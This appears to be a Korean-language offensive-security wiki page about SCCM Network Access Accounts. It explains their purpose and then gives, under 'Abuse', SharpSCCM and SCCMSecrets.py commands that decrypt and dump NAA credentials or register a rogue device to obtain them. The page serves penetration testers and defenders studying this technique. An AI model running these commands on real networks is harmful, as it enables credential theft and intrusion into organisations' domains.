Network Access Account

SCCM 서버에서 배포한 소프트웨어는 SDPs(Software Distribution Points)에 저장되어 있으며 클라이언트는 도메인 사용자임을 인증 후 SDPs(일반적으로 SMB)에 접근하여 소프트웨어를 다운로드 할 수 있습니다.

SDPs에 인가된 도메인 사용자임을 인증해야 하지만, 노트북과 같이 도메인에 조인할 수 없는 객체도 포함될 수 있습니다.

이처럼 NAA는 도메인에 속하지 않아 도메인 인증을 하지 못하는 상황(주로 노트북)에서도 공통 계정을 사용하여 SCCM 서버에 접속할 수 있도록 관리하는 특수 계정입니다.

Abuse

환경 구성 : NAA

# 관리자 권한 세션에서 도구를 사용한 자격 증명 복호화
.\SharpSCCM.exe local naa -m wmi --no-banner

# 로컬 디스크에 저장된 naa 자격 증명 덤프
.\SharpSCCM.exe local secrets -m disk

NAA 자격증명 탈취 및 복호화를 위해서는 SCCM 서버에 등록된 디바이스를 사용해야 합니다. UNIX 환경에서는 새로운 디바이스를 등록할 수 있을 때, 등록과 동시에 NAA 정보를 덤프합니다.

현재 이 과정을 도와주는 SCCMSecrets.py는 생성한 더미 디바이스를 제거하는 로직은 지원하지 않습니다.

디바이스 등록을 위해서는 이미 등록된 디바이스의 시스템 자격증명이 필요합니다.

# SCCM 서버에 새로운 디바이스 등록 및 naa 자격증명 덤프
python3 SCCMSecrets.py policies --management-point http://'<sccm-address>' --machine-name '<machine>' --machine-pass '<password>' -cn naaTest

References

Enhanced HTTP - Configuration ManagerMicrosoftLearn

The Phantom Credentials of SCCM: Why the NAA Won’t Die - SpecterOpsSpecterOps

SCCM Exploitation: Compromising Network Access AccountsGuidePoint Security

PreviousSCCM NextAuto approval

Last updated 2 months ago